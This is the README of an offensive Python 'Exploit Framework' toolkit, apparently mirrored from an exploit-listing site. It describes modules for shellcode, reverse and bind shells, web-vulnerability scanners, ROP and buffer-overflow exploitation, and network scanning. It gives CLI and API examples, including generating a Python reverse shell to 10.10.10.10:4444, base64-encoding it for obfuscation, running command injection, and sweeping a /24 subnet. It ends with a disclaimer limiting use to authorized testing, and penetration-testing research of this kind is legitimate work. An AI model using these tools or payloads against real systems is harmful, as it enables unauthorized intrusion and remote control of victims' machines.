Share
## https://sploitus.com/exploit?id=377F6548-C31D-529F-80FB-2A317F03E7CC
# Exploit Framework
[](https://opensource.org/licenses/MIT)
[](https://www.python.org/downloads/)
[]()
**Owner**: Nithish K (infonity404@gmail.com)
**Alias**: ShadowInfinitywarrior
A high-performance, modular security research toolkit for penetration testing, vulnerability research, and exploit development. Covers buffer overflows, web application exploits, and network protocol vulnerabilities.
## Table of Contents
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Payload Generator](#payload-generator)
- [Web Exploits](#web-exploits)
- [Binary Exploits](#binary-exploits)
- [Network Exploits](#network-exploits)
- [Encoders](#encoders)
- [CLI Reference](#cli-reference)
- [API Reference](#api-reference)
- [Examples](#examples)
- [Contributing](#contributing)
- [Legal Disclaimer](#legal-disclaimer)
- [Author](#author)
## Features
### Payload Generator
- Multi-architecture shellcode (Linux x86/x64, Windows x86/x64)
- Reverse shells (bash, nc, python, perl, ruby, java)
- Bind shells with multiple protocols
- ROP chains and egghunter shellcode
- NOP sled generation with customizable length
- Meterpreter payload templates
### Web Exploits
- SQL Injection scanner with error-based detection
- Cross-Site Scripting (XSS) scanner
- Local File Inclusion (LFI) scanner
- Remote File Inclusion (RFI) detection
- Command injection exploitation
- Server-Side Request Forgery (SSRF) scanner
- Open redirect finder
- CSRF token audit
### Binary Exploits
- ELF binary analysis (PIE, NX, Canary, RELRO)
- ROP gadget finder
- Buffer overflow pattern generation
- Ret2libc exploitation chain
- Process interaction utilities
### Network Exploits
- High-performance parallel port scanning (up to 100 threads)
- Service detection and banner grabbing
- TCP/UDP protocol fuzzing
- IP/TCP packet crafting
- ARP scanning for local network discovery
- Stealth SYN scanning
### Encoders
- Base64/Base32 encoding/decoding
- XOR encoder with customizable key
- URL encoding/decoding
- Hex encoding/decoding
- Rot13 cipher
- Caesar cipher with shift
- AES encryption
## Installation
```bash
# Clone the repository
git clone https://github.com/ShadowInfinitywarrior/exploit-framework.git
cd exploit-framework
# Install dependencies
pip install -r requirements.txt
# Or install as package
pip install -e .
```
### Requirements
- Python 3.8+
- requests
- pwntools
- scapy
- pycryptodome
## Quick Start
```python
from payloads import PayloadGenerator
from exploits.web import WebExploits
from exploits.network import NetworkExploits
from payloads.encoders import Base64Encoder
# Generate shellcode
gen = PayloadGenerator()
shellcode = gen.generate_shellcode('linux_x64')
# Web scanning
web = WebExploits(timeout=5)
vulns = web.sqli_scan('http://target.com/search', {'q': 'test'})
# Port scanning
net = NetworkExploits(threads=200, timeout=2)
open_ports = net.port_scan('192.168.1.1', [22, 80, 443, 8080])
```
## CLI Reference
### Payload Module
```bash
python main.py payload --shellcode linux_x64
python main.py payload --reverse-shell 127.0.0.1 4444 --reverse-shell-fmt python
python main.py payload --python-rev 127.0.0.1 4444
python main.py payload --php-rev 127.0.0.1 4444
python main.py payload --nop-sled 200
python main.py payload --egghunter --egghunter-tag W00T
```
### Web Exploits Module
```bash
python main.py web sqli --url http://target.com/search --param q
python main.py web xss --url http://target.com/page --param input
python main.py web lfi --url http://target.com/view --param file
python main.py web cmdi --url http://target.com/exec --param cmd
python main.py web ssrf --url http://target.com/fetch --param url
python main.py web redirect --url http://target.com/redirect --param url
```
### Binary Exploits Module
```bash
python main.py binary --pack64 0x401000
python main.py binary --pack32 0x401000
python main.py binary --pattern 5000
```
### Network Exploits Module
```bash
python main.py network --scan 192.168.1.1 --ports 22 80 443
python main.py network --banner 22 --scan 192.168.1.1
python main.py network --syn-scan 192.168.1.1 --ports 80,443
python main.py network --arp-scan
```
### Encode Module
```bash
python main.py encode --base64 "test payload"
python main.py encode --xor "test payload" --xor-key 0xAA
python main.py encode --hex "test payload"
python main.py encode --url "test payload"
```
## API Reference
### PayloadGenerator
```python
gen = PayloadGenerator()
# Shellcode
gen.generate_shellcode(arch='linux_x64') # Returns bytes
gen.shellcode.keys() # ['linux_x86', 'linux_x64', 'windows_x86', 'windows_x64']
# Reverse shells
gen.generate_reverse_shell(host, port, proto='tcp', fmt='bash')
gen.generate_python_reverse_shell(host, port)
gen.generate_php_reverse_shell(host, port)
# Helpers
gen.generate_nop_sled(length=100)
gen.generate_egghunter(tag=b'W00T', arch='x86')
gen.pack_ip_port(host, port)
gen.generate_custom(template, **kwargs)
```
### Encoders
```python
from payloads.encoders import Base64Encoder, XOREncoder
b64 = Base64Encoder()
b64.encode(b'data') # Base64 encode
b64.encode_urlsafe(b'data') # URL-safe Base64
b64.decode(b'ZGF0YQ==') # Decode
xor = XOREncoder(key=0xAA)
xor.encode(b'data') # XOR encode
xor.decode(b'\x9a\x9a') # XOR decode (same as encode)
```
### WebExploits
```python
web = WebExploits(timeout=5, verify_ssl=False)
web.sqli_scan(url, {param: payload})
web.xss_scan(url, {param: payload})
web.lfi_scan(url, param)
web.command_injection(url, param, command='id')
web.ssrf_scan(url, param)
web.open_redirect(url, param)
web.csrf_audit(url)
web.upload_bypass(url, {'file': fileobj})
```
### BinaryExploits
```python
bin = BinaryExploits(binary_path='./vulnerable_binary')
bin.find_elf_info('./binary') # Returns dict with arch, bits, canary, nx, pie, relro
bin.create_pattern(1000)
bin.find_gadgets('./binary', 'pop rdi')
bin.pack_64(addr) # Pack 64-bit address
bin.pack_32(addr) # Pack 32-bit address
bin.exploit('./binary', payload)
```
### NetworkExploits
```python
net = NetworkExploits(timeout=2.0, threads=100)
# Port scanning
net.port_scan('192.168.1.1', [22, 80, 443]) # [(port, is_open), ...]
net.syn_scan('192.168.1.1', [80, 443]) # Returns open ports list
# Service detection
net.service_detection('192.168.1.1', 22)
# Packet crafting
net.create_ip_packet('127.0.0.1', '192.168.1.1')
net.create_tcp_packet(1234, 80, flags='S')
net.tcp_fuzz('192.168.1.1', 9999, payload)
net.udp_fuzz('192.168.1.1', 9999, payload)
net.arp_scan(interface='eth0', network='192.168.1.0/24')
```
## Examples
### Generate and encode a reverse shell
```python
from payloads import PayloadGenerator
from payloads.encoders import Base64Encoder, XOREncoder
gen = PayloadGenerator()
shell = gen.generate_python_reverse_shell('10.10.10.10', 4444)
# Encode for obfuscation
b64 = Base64Encoder()
encoded = b64.encode(shell.encode())
print(f"Encoded payload: {encoded.decode()}")
```
### Fast network reconnaissance
```python
from exploits.network import NetworkExploits
net = NetworkExploits(threads=200, timeout=1.5)
hosts = ['192.168.1.{}'.format(i) for i in range(1, 255)]
for host in hosts:
results = net.port_scan(host, [22, 80, 443, 445, 3306, 5432])
open_ports = [p for p, status in results if status]
if open_ports:
service = net.service_detection(host, open_ports[0])
print(f"{host}: {open_ports} - {service}")
```
### Binary exploitation workflow
```python
from exploits.binary import BinaryExploits
bin = BinaryExploits()
info = bin.find_elf_info('./vulnerable')
if not info['nx'] and not info['canary']:
# Vulnerable to buffer overflow
offset = bin.create_pattern(5000)
payload = offset + bin.pack_64(0x401000) # ret addr
bin.exploit('./vulnerable', payload)
```
## Contributing
Contributions welcome! Please:
1. Fork the repository
2. Create a feature branch
3. Submit a pull request
## Legal Disclaimer
This tool is for **authorized security testing only**. Unauthorized use against systems you do not own is illegal. The author assumes no liability for misuse.
## Author
**Nithish K**
Email: infonity404@gmail.com
Alias: ShadowInfinitywarrior